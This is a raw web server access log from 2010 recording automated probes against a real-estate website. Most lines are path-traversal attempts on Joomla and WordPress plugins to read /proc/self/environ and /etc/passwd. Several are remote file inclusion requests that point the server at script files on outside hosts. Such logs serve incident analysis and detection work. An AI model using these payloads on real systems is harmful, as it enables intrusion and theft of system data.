67.215.230.121 - - [29/Jul/2010:04:34:16 -0700] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.joodsmaastricht.nl/idx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
67.215.230.121 - - [29/Jul/2010:04:34:16 -0700] "GET /logs/access.log%20%20//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.joodsmaastricht.nl/idx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
93.183.205.182 - - [29/Jul/2010:04:34:29 -0700] "GET /logs/access.log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.836" "www.prosouthrealty.com"
93.183.205.182 - - [29/Jul/2010:04:34:41 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.836" "www.prosouthrealty.com"
93.183.205.182 - - [29/Jul/2010:04:34:31 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.836" "www.prosouthrealty.com"
187.45.193.154 - - [29/Jul/2010:04:35:27 -0700] "GET /logs/access.log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
187.45.193.154 - - [29/Jul/2010:04:35:39 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
187.45.193.154 - - [29/Jul/2010:04:35:28 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
173.236.153.223 - - [29/Jul/2010:04:36:25 -0700] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
193.47.80.37 - - [29/Jul/2010:04:52:05 -0700] "GET /logs/?M=A HTTP/1.1" 200 1653 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "prosouthrealty.com"
173.236.153.223 - - [29/Jul/2010:04:54:43 -0700] "GET /logs/access.log/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
173.236.153.223 - - [29/Jul/2010:04:54:54 -0700] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
173.236.153.223 - - [29/Jul/2010:04:54:44 -0700] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
94.247.176.194 - - [29/Jul/2010:05:03:43 -0700] "GET /?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 916 "-" "libwww-perl/5.805" "www.prosouthrealty.com"
81.93.240.44 - - [29/Jul/2010:05:03:36 -0700] "GET /?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 916 "-" "libwww-perl/5.805" "www.prosouthrealty.com"
207.210.118.212 - - [29/Jul/2010:05:03:36 -0700] "GET /?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 916 "-" "libwww-perl/5.834" "www.prosouthrealty.com"
94.23.8.200 - - [29/Jul/2010:05:04:13 -0700] "GET /?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 916 "-" "libwww-perl/5.803" "www.prosouthrealty.com"
80.190.168.17 - - [29/Jul/2010:05:04:46 -0700] "GET /?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 916 "-" "libwww-perl/5.831" "www.prosouthrealty.com"
115.68.5.76 - - [29/Jul/2010:05:09:39 -0700] "GET /?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 916 "-" "libwww-perl/5.836" "www.prosouthrealty.com"
173.236.153.223 - - [29/Jul/2010:05:17:10 -0700] "GET /logs/access_100622.log/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
173.236.153.223 - - [29/Jul/2010:05:28:30 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
173.236.153.223 - - [29/Jul/2010:05:28:41 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
93.158.149.32 - - [29/Jul/2010:05:39:49 -0700] "GET /logs/access_100712.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.prosouthrealty.com"
213.180.89.75 - - [29/Jul/2010:06:13:18 -0700] "GET ///index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
200.29.171.35 - - [29/Jul/2010:06:15:12 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
200.29.171.35 - - [29/Jul/2010:06:15:01 -0700] "GET /logs/access.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
200.29.171.35 - - [29/Jul/2010:06:15:04 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
213.180.89.75 - - [29/Jul/2010:06:15:13 -0700] "GET ///index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
91.121.5.196 - - [29/Jul/2010:06:17:57 -0700] "GET ///index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.prosouthrealty.com"
41.191.225.246 - - [29/Jul/2010:06:19:36 -0700] "GET / HTTP/1.1" 200 916 "http://www.google.co.ke/search?q=Pro%20South%20Commercial%20Realty" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2" "www.prosouthrealty.com"
91.121.5.196 - - [29/Jul/2010:06:21:57 -0700] "GET ///index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.prosouthrealty.com"
213.180.89.75 - - [29/Jul/2010:06:26:21 -0700] "GET /logs/access.log////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
213.180.89.75 - - [29/Jul/2010:06:26:10 -0700] "GET ///index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
213.180.89.75 - - [29/Jul/2010:06:26:22 -0700] "GET /logs////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
189.21.153.139 - - [29/Jul/2010:06:28:57 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.prosouthrealty.com"
189.21.153.139 - - [29/Jul/2010:06:30:57 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.prosouthrealty.com"
189.21.153.139 - - [29/Jul/2010:06:31:59 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.prosouthrealty.com"
189.21.153.139 - - [29/Jul/2010:06:33:51 -0700] "GET /logs/access.log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.prosouthrealty.com"
189.21.153.139 - - [29/Jul/2010:06:33:51 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.prosouthrealty.com"
189.21.153.139 - - [29/Jul/2010:06:33:52 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.prosouthrealty.com"
91.121.5.196 - - [29/Jul/2010:06:38:25 -0700] "GET /logs/access.log////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.prosouthrealty.com"
91.121.5.196 - - [29/Jul/2010:06:38:37 -0700] "GET ///index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.prosouthrealty.com"
91.121.5.196 - - [29/Jul/2010:06:38:26 -0700] "GET /logs////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.prosouthrealty.com"
200.6.154.127 - - [29/Jul/2010:06:38:58 -0700] "GET /index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.prosouthrealty.com"
208.64.68.228 - - [29/Jul/2010:06:41:03 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.historiavirtual.org/modules/mod_files/yuki/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
208.64.68.228 - - [29/Jul/2010:06:41:03 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.historiavirtual.org/modules/mod_files/yuki/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
208.64.68.228 - - [29/Jul/2010:06:41:03 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.historiavirtual.org/modules/mod_files/yuki/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
91.121.5.196 - - [29/Jul/2010:06:41:56 -0700] "GET /logs/access.log////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.prosouthrealty.com"
91.121.5.196 - - [29/Jul/2010:06:41:56 -0700] "GET ///index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.prosouthrealty.com"
91.121.5.196 - - [29/Jul/2010:06:41:56 -0700] "GET /logs////index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.prosouthrealty.com"
213.180.89.75 - - [29/Jul/2010:06:44:15 -0700] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
208.64.68.228 - - [29/Jul/2010:06:44:24 -0700] "GET /logs/access_100626.log%20%20//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.historiavirtual.org/modules/mod_files/yuki/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
208.64.68.228 - - [29/Jul/2010:06:44:24 -0700] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.historiavirtual.org/modules/mod_files/yuki/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
208.64.68.228 - - [29/Jul/2010:06:44:24 -0700] "GET /administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.historiavirtual.org/modules/mod_files/yuki/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
213.180.89.75 - - [29/Jul/2010:06:47:46 -0700] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
213.180.89.75 - - [29/Jul/2010:06:47:49 -0700] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
91.121.5.196 - - [29/Jul/2010:06:50:03 -0700] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.prosouthrealty.com"
213.180.89.75 - - [29/Jul/2010:06:50:17 -0700] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
189.21.153.139 - - [29/Jul/2010:06:50:14 -0700] "GET /logs/access.log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.prosouthrealty.com"
189.21.153.139 - - [29/Jul/2010:06:50:14 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.prosouthrealty.com"
213.180.89.75 - - [29/Jul/2010:06:50:26 -0700] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
189.21.153.139 - - [29/Jul/2010:06:50:26 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.prosouthrealty.com"
213.239.223.4 - - [29/Jul/2010:06:52:29 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "amibot - http://www.amidalla.de - tech@amidalla.com libwww-perl/5.831" "www.prosouthrealty.com"
213.239.223.4 - - [29/Jul/2010:06:52:29 -0700] "GET / HTTP/1.1" 200 916 "-" "amibot - http://www.amidalla.de - tech@amidalla.com libwww-perl/5.831" "www.prosouthrealty.com"
81.21.79.214 - - [29/Jul/2010:06:55:09 -0700] "GET /logs/access.log//index.php?option=com_rokdownloads&controller=....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.prosouthrealty.com"
81.21.79.214 - - [29/Jul/2010:06:55:20 -0700] "GET /index.php?option=com_rokdownloads&controller=....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.prosouthrealty.com"
81.21.79.214 - - [29/Jul/2010:06:55:09 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.prosouthrealty.com"
200.6.154.127 - - [29/Jul/2010:06:55:40 -0700] "GET /logs/access.log//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.prosouthrealty.com"
200.6.154.127 - - [29/Jul/2010:06:55:51 -0700] "GET /index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.prosouthrealty.com"
200.6.154.127 - - [29/Jul/2010:06:55:51 -0700] "GET /logs//index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.prosouthrealty.com"
174.120.181.101 - - [29/Jul/2010:06:55:40 -0700] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.prosouthrealty.com"
94.23.215.207 - - [29/Jul/2010:06:56:35 -0700] "GET /?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 916 "-" "libwww-perl/5.803" "www.prosouthrealty.com"
94.23.215.207 - - [29/Jul/2010:06:58:10 -0700] "GET /logs/access.log/?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.prosouthrealty.com"
94.23.215.207 - - [29/Jul/2010:06:58:21 -0700] "GET /?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 916 "-" "libwww-perl/5.803" "www.prosouthrealty.com"
94.23.215.207 - - [29/Jul/2010:06:58:11 -0700] "GET /logs/?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1510 "-" "libwww-perl/5.803" "www.prosouthrealty.com"
213.180.89.75 - - [29/Jul/2010:06:58:18 -0700] "GET /logs/access.log///index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
213.180.89.75 - - [29/Jul/2010:06:58:30 -0700] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
213.180.89.75 - - [29/Jul/2010:06:58:19 -0700] "GET /logs///index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
81.21.79.214 - - [29/Jul/2010:06:59:02 -0700] "GET /index.php?option=com_gcalendar&controller=....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.prosouthrealty.com"
81.21.79.214 - - [29/Jul/2010:06:59:17 -0700] "GET /index.php?option=com_rokdownloads&controller=....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.prosouthrealty.com"
125.141.91.138 - - [29/Jul/2010:07:01:01 -0700] "GET /index.php?option=com_bca-rss-syndicator&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
94.23.215.207 - - [29/Jul/2010:07:01:20 -0700] "GET /logs/access_100624.log/?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.prosouthrealty.com"
208.64.68.228 - - [29/Jul/2010:07:02:35 -0700] "GET /logs/access.log%20%20//index.php?option=com_g2bridge&controller=http://www.historiavirtual.org/modules/mod_files/yuki/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
208.64.68.228 - - [29/Jul/2010:07:02:35 -0700] "GET /index.php?option=com_g2bridge&controller=http://www.historiavirtual.org/modules/mod_files/yuki/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
208.64.68.228 - - [29/Jul/2010:07:02:35 -0700] "GET /logs//index.php?option=com_g2bridge&controller=http://www.historiavirtual.org/modules/mod_files/yuki/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.prosouthrealty.com"
91.121.5.196 - - [29/Jul/2010:07:02:41 -0700] "GET /logs/access.log///index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.prosouthrealty.com"
91.121.5.196 - - [29/Jul/2010:07:02:52 -0700] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.prosouthrealty.com"
91.121.5.196 - - [29/Jul/2010:07:02:41 -0700] "GET /logs///index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.prosouthrealty.com"
81.21.79.214 - - [29/Jul/2010:07:05:57 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.prosouthrealty.com"
81.21.79.214 - - [29/Jul/2010:07:05:46 -0700] "GET /index.php?option=com_gcalendar&controller=....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.prosouthrealty.com"
81.21.79.214 - - [29/Jul/2010:07:05:47 -0700] "GET /logs//index.php?option=com_gcalendar&controller=....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.prosouthrealty.com"
189.21.153.139 - - [29/Jul/2010:07:08:39 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.prosouthrealty.com"
213.180.89.75 - - [29/Jul/2010:07:08:28 -0700] "GET /logs/access.log///index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.prosouthrealty.com"
